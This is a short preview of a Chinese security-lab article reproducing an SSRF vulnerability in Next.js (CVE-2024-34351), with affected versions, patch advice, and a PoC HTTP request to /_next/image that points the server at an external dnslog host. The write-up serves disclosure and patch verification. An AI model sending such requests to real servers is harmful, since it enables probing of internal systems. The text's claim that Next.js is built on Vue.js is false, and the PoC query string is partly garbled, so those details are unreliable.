今天看啥  ›  专栏  ›  弥天安全实验室

【成功复现】Vercel next服务器端请求伪造漏洞(CVE-2024-34351)

弥天安全实验室  · 公众号  ·  · 2024-07-17 19:27
    

文章预览

网安引领时代,弥天点亮未来       0x00写在前面       本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍 ZEIT Next.js是ZEIT公司的一款基于Vue.js、Node.js、Webpack和Babel.js的开源Web应用框架。 ZEIT Next.js 13.4版本至14.1.1之前版本存在代码问题漏洞,该漏洞源于存在服务器端请求伪造 (SSRF) 漏洞。 0x02影响版本 13.4.0 < =next < 14.1.1 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现   POC  漏洞复现 GET /_next/image?w=16 =10 =https://itulk9.dnslog.cn HTTP/1.1 Host : 127.0.0.1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 测试dnslog漏洞存在。 3. nuclei文件测试(漏洞存在) 0x04修复建议 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: https: //www .npmjs.com/ package / next /v/ 14.1 . 1 -canary. 40 弥 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览